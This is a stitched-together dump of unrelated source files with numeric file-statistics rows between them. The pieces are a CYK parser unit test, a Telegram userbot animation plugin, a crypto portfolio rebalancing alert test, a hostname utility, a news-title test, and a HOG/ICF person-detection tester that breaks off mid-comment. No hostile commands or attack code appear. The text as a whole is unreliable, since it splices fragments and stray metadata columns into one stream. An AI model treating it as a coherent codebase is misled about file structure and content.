self.assertTrue(cyk([a, a, a, a, a, b, b, b, b, b], grammar))
self.assertTrue(cyk([a, b, a, b], grammar))
self.assertFalse(cyk([a, b, a], grammar))
self.assertFalse(cyk([a, a, a, a, b], grammar))
self.assertFalse(cyk([a, b, b, b, b], grammar))
self.assertFalse(cyk([a, a, a, a, a], grammar))
self.assertFalse(cyk([b, b, b, b, b], grammar))
def test_aNbN_cyk(self):
grammar = CNF.from_file(aNbN)
self.assertTrue(cyk([], grammar))
self.assertTrue(cyk([a, b], grammar))
self.assertTrue(cyk([a, a, b, b], grammar))
self.assertTrue(cyk([a, a, a, a, a, b, b, b, b, b], grammar))
self.assertFalse(cyk([a, b, a, b], grammar))
self.assertFalse(cyk([a, b, a], grammar))
self.assertFalse(cyk([a, a, a, a, b], grammar))
self.assertFalse(cyk([a, b, b, b, b], grammar))
self.assertFalse(cyk([a, a, a, a, a], grammar))
self.assertFalse(cyk([b, b, b, b, b], grammar))
def test_aNbN_cyk_reduced(self):
grammar = CNF.from_file(aNbN, is_reduced=True)
self.assertTrue(cyk([], grammar))
self.assertTrue(cyk([a, b], grammar))
self.assertTrue(cyk([a, a, b, b], grammar))
self.assertTrue(cyk([a, a, a, a, a, b, b, b, b, b], grammar))
self.assertFalse(cyk([a, b, a, b], grammar))
self.assertFalse(cyk([a, b, a], grammar))
self.assertFalse(cyk([a, a, a, a, b], grammar))
self.assertFalse(cyk([a, b, b, b, b], grammar))
self.assertFalse(cyk([a, a, a, a, a], grammar))
self.assertFalse(cyk([b, b, b, b, b], grammar))
def test_task_4_3_1(self):
grammar = CNF.from_file(task_1_grammar, Variable('E'))
self.assertFalse(cyk([], grammar))
self.assertTrue(cyk([open, n, plus, n, close, mult, n], grammar))
self.assertTrue(cyk([n, plus, n, mult, n], grammar))
self.assertTrue(cyk([n, plus, n, plus, n, plus, n], grammar))
self.assertTrue(cyk([n, plus, open, n, mult, n, close, plus, n], grammar))
self.assertFalse(cyk([n, plus, n, mult, n, close, plus, n], grammar))
self.assertFalse(cyk([n, plus, open, n, mult, n, close, n], grammar))
self.assertFalse(cyk([n, plus, open, n, mult, close, plus, n], grammar))
self.assertFalse(cyk([plus, open, n, mult, n, close, plus, n], grammar))
if __name__ == '__main__':
unittest.main()
| 44.921348
| 118
| 0.596048
| 609
| 3,998
| 3.844007
| 0.090312
| 0.044425
| 0.043571
| 0.277659
| 0.841094
| 0.816318
| 0.789406
| 0.739
| 0.734729
| 0.688167
| 0
| 0.002551
| 0.215608
| 3,998
| 88
| 119
| 45.431818
| 0.743941
| 0
| 0
| 0.538462
| 0
| 0.038462
| 0.074537
| 0.070535
| 0
| 0
| 0
| 0
| 0.653846
| 1
| 0.064103
| false
| 0
| 0.051282
| 0
| 0.128205
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
0b4f3f1111eca88078aaad0c140e84ae454a1b08
| 4,673
|
py
|
Python
|
userbot/modules/animasi7.py
|
Wiki28/WikixCilik
|
a7e8d684e34174001af3e69d1f00de4e98243abe
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/animasi7.py
|
Wiki28/WikixCilik
|
a7e8d684e34174001af3e69d1f00de4e98243abe
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/animasi7.py
|
Wiki28/WikixCilik
|
a7e8d684e34174001af3e69d1f00de4e98243abe
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#greyyvbss
import asyncio
from userbot import CMD_HANDLER as cmd
from userbot import CMD_HELP
from userbot.utils import edit_or_reply, cilik_cmd
@cilik_cmd(pattern="cilik(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(11)
event = await edit_or_reply(event, "Cilik-Userbot....")
animation_chars = [
"⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
"⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
"⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
"⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
"⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
"⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
"⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
"⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
"⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n",
"⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
"⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️..**Cɪʟɪᴋ Uꜱᴇʀʙᴏᴛ**..⚪️⚫️⚪️\n⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️\n⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️⚫️⚪️\n",
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 192])
@cilik_cmd(pattern="city(?: |$)(.*)")
async def _(event):
await edit_or_reply(
event,
"""☁☁🌞 ☁ ☁
☁ ✈ ☁ 🚁 ☁ ☁ ☁ ☁ ☁ ☁
🏬🏨🏫🏢🏤🏥🏦🏪🏫
🌲/ l🚍\🌳👭
🌳/ 🚘 l 🏃 \🌴 👬 👬 🌴/ l 🚔 \🌲
🌲/ 🚖 l \
🌳/🚶 | 🚍 \ 🌴🚴🚴
🌴/ | \🌲"""
)
@cilik_cmd(pattern="plane(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(14)
event = await edit_or_reply(event, "Wait for plane...")
animation_chars = [
"✈-------------",
"-✈------------",
"--✈-----------",
"---✈----------",
"----✈---------",
"-----✈--------",
"------✈-------",
"-------✈------",
"--------✈-----",
"---------✈----",
"----------✈---",
"-----------✈--",
"------------✈-",
"-------------✈",
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 12])
@cilik_cmd(pattern="police(?: |$)(.*)")
async def _(event):
if event.fwd_from:
return
animation_interval = 0.3
animation_ttl = range(11)
event = await edit_or_reply(event, "Police")
animation_chars = [
"🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
"🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
"🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
"🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
"🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
"🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
"🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
"🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
"🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
"🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴\n🔵🔵🔵⬜⬜⬜🔴🔴🔴",
"🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵\n🔴🔴🔴⬜⬜⬜🔵🔵🔵",
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
CMD_HELP.update(
{
"animasi7": f"➢ **Plugin : **`animasi7`\
\n\n ┌✪ **Command :** `{cmd}cilik`\
\n └✪ **Function : **Animasi Cilik Userbot.\
\n\n ┌✪ **Command :** `{cmd}city`\
\n └✪ **Function : **Mengirim Gambar Kota.\
\n\n ┌✪ **Command :** `{cmd}plane`\
\n └✪ **Function : **Mengirim Gambar Animasi Pesawat.\
\n\n ┌✪ **Command :** `{cmd}police`\
\n └✪ **Function : **Mengirim Gambar Animasi Polisi.\
"
}
)
| 39.268908
| 143
| 0.28547
| 485
| 4,673
| 5.703093
| 0.173196
| 0.182936
| 0.190889
| 0.266088
| 0.841649
| 0.810195
| 0.768257
| 0.768257
| 0.768257
| 0.768257
| 0
| 0.005915
| 0.240317
| 4,673
| 118
| 144
| 39.601695
| 0.357746
| 0.001926
| 0
| 0.473684
| 0
| 0
| 0.482234
| 0.408629
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.042105
| 0
| 0.073684
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
f07c98981bb8f205ead60ed688b9882a5c31925f
| 433
|
py
|
Python
|
tests/unit/test_top_news_titles.py
|
matthewcheng222/COVID19_Smart_Alarm
|
3e19ed869a44707525aabfe96823f0f5db0efab4
|
[
"MIT"
] | null | null | null |
tests/unit/test_top_news_titles.py
|
matthewcheng222/COVID19_Smart_Alarm
|
3e19ed869a44707525aabfe96823f0f5db0efab4
|
[
"MIT"
] | null | null | null |
tests/unit/test_top_news_titles.py
|
matthewcheng222/COVID19_Smart_Alarm
|
3e19ed869a44707525aabfe96823f0f5db0efab4
|
[
"MIT"
] | null | null | null |
import top_news_titles
def test_top_news_titles_outputtype():
assert isinstance(top_news_titles.top_news_titles(), str)
def test_top_news_titles_outputlength():
assert len(top_news_titles.top_news_titles()) > 0
def test_top_news_titles_outputuppercase():
assert top_news_titles.top_news_titles()[0].isupper()
def test_top_news_titles_outputword():
assert top_news_titles.top_news_titles()[0:12] == "Here are the"
| 30.928571
| 68
| 0.799076
| 67
| 433
| 4.656716
| 0.298507
| 0.291667
| 0.541667
| 0.179487
| 0.637821
| 0.38141
| 0.298077
| 0.211538
| 0
| 0
| 0
| 0.012887
| 0.103926
| 433
| 13
| 69
| 33.307692
| 0.791237
| 0
| 0
| 0
| 0
| 0
| 0.027714
| 0
| 0
| 0
| 0
| 0
| 0.444444
| 1
| 0.444444
| true
| 0
| 0.111111
| 0
| 0.555556
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
b2be6dc85d515619df14ccbf6d14d5d8b7add751
| 144
|
py
|
Python
|
src/utils.py
|
DeftWork/FlaskApp
|
cd9465e95df4eaa14ddd3a626134be91808e76a2
|
[
"MIT"
] | null | null | null |
src/utils.py
|
DeftWork/FlaskApp
|
cd9465e95df4eaa14ddd3a626134be91808e76a2
|
[
"MIT"
] | 4
|
2021-06-08T21:47:01.000Z
|
2022-03-12T00:35:17.000Z
|
src/utils.py
|
DeftWork/FlaskApp
|
cd9465e95df4eaa14ddd3a626134be91808e76a2
|
[
"MIT"
] | null | null | null |
import socket
def gethostname():
return socket.gethostname()
def getlocaladdress():
return socket.gethostbyname(socket.gethostname())
| 18
| 53
| 0.756944
| 14
| 144
| 7.785714
| 0.5
| 0.220183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138889
| 144
| 7
| 54
| 20.571429
| 0.879032
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.4
| true
| 0
| 0.2
| 0.4
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
653768702ac776de24377887b65c40f1056b46af
| 3,490
|
py
|
Python
|
test_main.py
|
joigno/cryptoalerts
|
e63da6f3b8d773325fd9604d0236b7fc50c7125c
|
[
"MIT"
] | null | null | null |
test_main.py
|
joigno/cryptoalerts
|
e63da6f3b8d773325fd9604d0236b7fc50c7125c
|
[
"MIT"
] | 1
|
2022-03-29T19:39:21.000Z
|
2022-03-29T19:39:21.000Z
|
test_main.py
|
joigno/cryptoalerts
|
e63da6f3b8d773325fd9604d0236b7fc50c7125c
|
[
"MIT"
] | null | null | null |
from main import run
import json
def test_below_percentage():
alerts_text = '''
[
{
"portfolio": "volatility",
"name": "cash-up",
"type": "cash_percentage",
"condition": ">",
"value": "66.6",
"recipient" : "joigno",
"message" : "Cash Value of portfolio 'volatility' is above 66.6%",
"min_trades_usd" : "10.0"
},
{
"portfolio": "volatility",
"name": "cash-down",
"type": "cash_percentage",
"condition": "<",
"value": "33.3",
"recipient" : "joigno",
"message" : "Cash Value of portfolio 'volatility' is below 33.3%",
"min_trades_usd" : "10.0"
}
]
'''
alerts = json.loads(alerts_text)
portfolio_text = '''
{
"volatility": {
"portfolio_assets": {
"ethereum": {
"amount": "0.4"
},
"bitcoin": {
"amount": "0.01"
},
"usd": {
"amount": "5784.0"
}
}
}
}
'''
prices = {
'bitcoin' : 41704.0,
'ethereum' : 2935.0,
}
ret = '''Cash Value of portfolio 'volatility' is below 33.3%<br/>
<br/>
SELL 0.121080 ETHEREUM<br/>
BUY 0.009630 BITCOIN'''
portfolio = json.loads(portfolio_text)
assert run(portfolio, alerts, prices) == ret
def test_above_percentage():
alerts_text = '''
[
{
"portfolio": "volatility",
"name": "cash-up",
"type": "cash_percentage",
"condition": ">",
"value": "66.6",
"recipient" : "joigno",
"message" : "Cash Value of portfolio 'volatility' is above 66.6%",
"min_trades_usd" : "10.0"
},
{
"portfolio": "volatility",
"name": "cash-down",
"type": "cash_percentage",
"condition": "<",
"value": "33.3",
"recipient" : "joigno",
"message" : "Cash Value of portfolio 'volatility' is below 33.3%",
"min_trades_usd" : "10.0"
}
]
'''
alerts = json.loads(alerts_text)
portfolio_text = '''
{
"volatility": {
"portfolio_assets": {
"ethereum": {
"amount": "4.0"
},
"bitcoin": {
"amount": "0.1"
},
"usd": {
"amount": "5784.0"
}
}
}
}
'''
prices = {
'bitcoin' : 41704.0,
'ethereum' : 2935.0,
}
ret = '''Cash Value of portfolio 'volatility' is above 66.6%<br/>
<br/>
SELL 2.359061 ETHEREUM<br/>
BUY 0.015484 BITCOIN'''
portfolio = json.loads(portfolio_text)
assert run(portfolio, alerts, prices) == ret
def test_good_percentage():
alerts_text = '''
[
{
"portfolio": "volatility",
"name": "cash-up",
"type": "cash_percentage",
"condition": ">",
"value": "66.6",
"recipient" : "joigno",
"message" : "Cash Value of portfolio 'volatility' is above 66.6%",
"min_trades_usd" : "10.0"
},
{
"portfolio": "volatility",
"name": "cash-down",
"type": "cash_percentage",
"condition": "<",
"value": "33.3",
"recipient" : "joigno",
"message" : "Cash Value of portfolio 'volatility' is below 33.3%",
"min_trades_usd" : "10.0"
}
]
'''
alerts = json.loads(alerts_text)
portfolio_text = '''
{
"volatility": {
"portfolio_assets": {
"ethereum": {
"amount": "1.0"
},
"bitcoin": {
"amount": "0.005"
},
"usd": {
"amount": "5784.0"
}
}
}
}
'''
prices = {
'bitcoin' : 41704.0,
'ethereum' : 2935.0,
}
ret = ''''''
portfolio = json.loads(portfolio_text)
assert run(portfolio, alerts, prices) == ret
| 20.898204
| 70
| 0.516046
| 361
| 3,490
| 4.880886
| 0.163435
| 0.150965
| 0.049943
| 0.090806
| 0.902384
| 0.902384
| 0.902384
| 0.902384
| 0.902384
| 0.893303
| 0
| 0.060985
| 0.290544
| 3,490
| 166
| 71
| 21.024096
| 0.650646
| 0
| 0
| 0.620253
| 0
| 0
| 0.737959
| 0
| 0
| 0
| 0
| 0
| 0.018987
| 1
| 0.018987
| false
| 0
| 0.012658
| 0
| 0.031646
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
334106c5e33551e11c8ead2410be7e48b4581a0c
| 9,822
|
py
|
Python
|
detection/tester.py
|
mataevs/persondetector
|
08d21862474989cfc64bd182321b1eebf0cbd12b
|
[
"MIT"
] | null | null | null |
detection/tester.py
|
mataevs/persondetector
|
08d21862474989cfc64bd182321b1eebf0cbd12b
|
[
"MIT"
] | null | null | null |
detection/tester.py
|
mataevs/persondetector
|
08d21862474989cfc64bd182321b1eebf0cbd12b
|
[
"MIT"
] | null | null | null |
__author__ = 'mataevs'
import tester_hog
import tester_icf
import cv2
import random
import utils
import os
import detection_checker
import optical_flow
from collections import Counter
import time
def test_multiscale(
hog_classifier_file,
icf_classifier_file,
hog_result_dir,
icf_result_dir,
no_samples):
hog_classifier = tester_hog.load_classifier(hog_classifier_file)
icf_classifier = tester_icf.load_classifier(icf_classifier_file)
filepaths = [
"/home/mataevs/captures/metadata/dump_05_05_01_50",
"/home/mataevs/captures/metadata/dump_05_06_13_10",
"/home/mataevs/captures/metadata/dump_10_06_11_47",
"/home/mataevs/captures/metadata/dump_05_05_01_51",
"/home/mataevs/captures/metadata/dump_05_06_13_15",
"/home/mataevs/captures/metadata/dump_07_05_11_40",
"/home/mataevs/captures/metadata/dump_10_06_11_48",
"/home/mataevs/captures/metadata/dump_05_05_11_54",
"/home/mataevs/captures/metadata/dump_05_06_13_20",
"/home/mataevs/captures/metadata/dump_07_05_11_46",
"/home/mataevs/captures/metadata/dump_10_06_12_16",
"/home/mataevs/captures/metadata/dump_05_06_12_57",
"/home/mataevs/captures/metadata/dump_05_06_13_21",
"/home/mataevs/captures/metadata/dump_05_06_13_24",
"/home/mataevs/captures/metadata/dump_16_06_14_57",
"/home/mataevs/captures/metadata/dump_05_06_13_25",
"/home/mataevs/captures/metadata/dump_07_05_12_03",
"/home/mataevs/captures/metadata/dump_16_06_15_26",
"/home/mataevs/captures/metadata/dump_05_06_13_28",
"/home/mataevs/captures/metadata/dump_07_05_12_05"
]
if not os.path.exists(hog_result_dir):
os.makedirs(hog_result_dir)
if not os.path.exists(icf_result_dir):
os.makedirs(icf_result_dir)
testImages = utils.getFullImages(*filepaths)
metadata = utils.parseMetadata(*filepaths)
scales = [
[0.45, 0.5, 0.55],
[0.4, 0.45, 0.5],
[0.3, 0.35],
[0.3]
]
scaleSteps = [35, 45, 65, 90]
for sample in range(0, no_samples):
print "### Sample " + str(sample) + " ###"
imgPath = random.choice(testImages)
img = cv2.imread(imgPath)
tilt = int(metadata[imgPath]['tilt'])
if tilt > 90:
tilt = 90 - (tilt - 90)
imgScales = []
for i in range(0, len(scaleSteps)):
if tilt < scaleSteps[i]:
imgScales = scales[i]
break
print imgScales
prev_img_path = utils.get_prev_img(imgPath)
prev_img = cv2.imread(prev_img_path)
flow_rgb, boundingRect = optical_flow.optical_flow(img, prev_img)
height, width, _ = img.shape
bestWindowsHog = tester_hog.test_img(hog_classifier, imgPath, imgScales, allPositive=True, flow_rgb=flow_rgb, subwindow=boundingRect)
if bestWindowsHog != None and bestWindowsHog != []:
scale = bestWindowsHog[0][4]
img_hog = cv2.resize(img, (0, 0), fx=scale, fy=scale)
if boundingRect != None:
x, y, w, h = utils.getDetectionWindow(boundingRect, img_hog.shape[1], img_hog.shape[0], scale)
cv2.rectangle(img_hog, (x, y), (x+w, y+h), (0, 0, 255), thickness=2, lineType=8)
utils.draw_detections(img_hog, bestWindowsHog)
else:
scale = 0.5
img_hog = cv2.resize(img, (0, 0), fx=scale, fy=scale)
if boundingRect != None:
x, y, w, h = utils.getDetectionWindow(boundingRect, img_hog.shape[1], img_hog.shape[0], scale)
cv2.rectangle(img_hog, (x, y), (x+w, y+h), (0, 0, 255), thickness=2, lineType=8)
cv2.imwrite(hog_result_dir + "/sample_2_" + str(sample) + ".jpg", img_hog)
bestWindowsIcf = tester_icf.test_img(icf_classifier, imgPath, imgScales, allPositive=True, subwindow=boundingRect)
if bestWindowsIcf != None and bestWindowsIcf != []:
scale = bestWindowsIcf[0][4]
img_icf = cv2.resize(img, (0, 0), fx=scale, fy=scale)
if boundingRect != None:
x, y, w, h = utils.getDetectionWindow(boundingRect, img_icf.shape[1], img_icf.shape[0], scale)
cv2.rectangle(img_icf, (x, y), (x+w, y+h), (0, 0, 255), thickness=2, lineType=8)
utils.draw_detections(img_icf, bestWindowsIcf)
else:
scale = 0.5
img_icf = cv2.resize(img, (0, 0), fx=scale, fy=scale)
if boundingRect != None:
x, y, w, h = utils.getDetectionWindow(boundingRect, img_icf.shape[1], img_icf.shape[0], scale)
cv2.rectangle(img_icf, (x, y), (x+w, y+h), (0, 0, 255), thickness=2, lineType=8)
cv2.imwrite(icf_result_dir + "/sample_2_" + str(sample) + ".jpg", img_icf)
def test_multiscale_checker(
hog_classifier_file,
icf_classifier_file,
hog_result_dir,
icf_result_dir,
checker,
resultsFile):
hog_classifier = tester_hog.load_classifier(hog_classifier_file)
# icf_classifier = tester_icf.load_classifier(icf_classifier_file)
filepaths = [
"/home/mataevs/captures/metadata/dump_05_05_01_50",
"/home/mataevs/captures/metadata/dump_05_06_13_10",
"/home/mataevs/captures/metadata/dump_10_06_11_47",
"/home/mataevs/captures/metadata/dump_05_05_01_51",
"/home/mataevs/captures/metadata/dump_05_06_13_15",
"/home/mataevs/captures/metadata/dump_07_05_11_40",
"/home/mataevs/captures/metadata/dump_10_06_11_48",
"/home/mataevs/captures/metadata/dump_05_05_11_54",
"/home/mataevs/captures/metadata/dump_05_06_13_20",
"/home/mataevs/captures/metadata/dump_07_05_11_46",
"/home/mataevs/captures/metadata/dump_10_06_12_16",
"/home/mataevs/captures/metadata/dump_05_06_12_57",
"/home/mataevs/captures/metadata/dump_05_06_13_21",
"/home/mataevs/captures/metadata/dump_05_06_13_24",
"/home/mataevs/captures/metadata/dump_16_06_14_57",
"/home/mataevs/captures/metadata/dump_05_06_13_25",
"/home/mataevs/captures/metadata/dump_07_05_12_03",
"/home/mataevs/captures/metadata/dump_16_06_15_26",
"/home/mataevs/captures/metadata/dump_05_06_13_28",
"/home/mataevs/captures/metadata/dump_07_05_12_05"
]
if not os.path.exists(hog_result_dir):
os.makedirs(hog_result_dir)
if not os.path.exists(icf_result_dir):
os.makedirs(icf_result_dir)
metadata = utils.parseMetadata(*filepaths)
scales = [
[0.45, 0.5, 0.55],
[0.4, 0.45, 0.5],
[0.3, 0.35],
[0.3]
]
scaleSteps = [35, 45, 65, 90]
resultsHog = open(resultsFile + "hog.txt", "w")
# resultsIcf = open(resultsFile + "icf.txt", "w")
sample = 0
for imgPath in checker.getFileList():
img = cv2.imread(imgPath)
tilt = int(metadata[imgPath]['tilt'])
if tilt > 90:
tilt = 90 - (tilt - 90)
imgScales = []
for i in range(0, len(scaleSteps)):
if tilt < scaleSteps[i]:
imgScales = scales[i]
break
#prev_img_path = utils.get_prev_img(imgPath)
# prev_img = cv2.imread(prev_img_path)
# flow_rgb, boundingRect = optical_flow.optical_flow(img, prev_img)
flow_rgb, boundingRect = None, None
height, width, _ = img.shape
posWindowsHog = tester_hog.test_img(hog_classifier, imgPath, imgScales, subwindow=boundingRect)
if posWindowsHog != None and posWindowsHog != []:
utils.draw_detections(img, posWindowsHog)
cv2.imwrite(hog_result_dir + "/sample_2_" + str(sample) + ".jpg", img)
# Check detections
detections, truePositive = checker.checkDetections(imgPath, posWindowsHog)
c = Counter(detections)
truePositives = c[True]
falsePositives = c[False]
falseNegative = 0 if truePositive else 1
resultsHog.write(imgPath + " tp=" + str(truePositives) + " fp=" + str(falsePositives) + " fn=" + str(falseNegative) + "\n")
# beforeIcf = time.time()
# windowsIcf = tester_icf.test_img(icf_classifier, imgPath, imgScales, allPositive=True, subwindow=boundingRect)
# afterIcf = time.time()
#
# print "Sample", sample, "time elapsed=", afterIcf-beforeIcf
#
# if windowsIcf != None and windowsIcf != []:
# scale = windowsIcf[0][4]
# img_icf = cv2.resize(img, (0, 0), fx=scale, fy=scale)
# utils.draw_detections(img_icf, windowsIcf)
# else:
# scale = 0.5
# img_icf = cv2.resize(img, (0, 0), fx=scale, fy=scale)
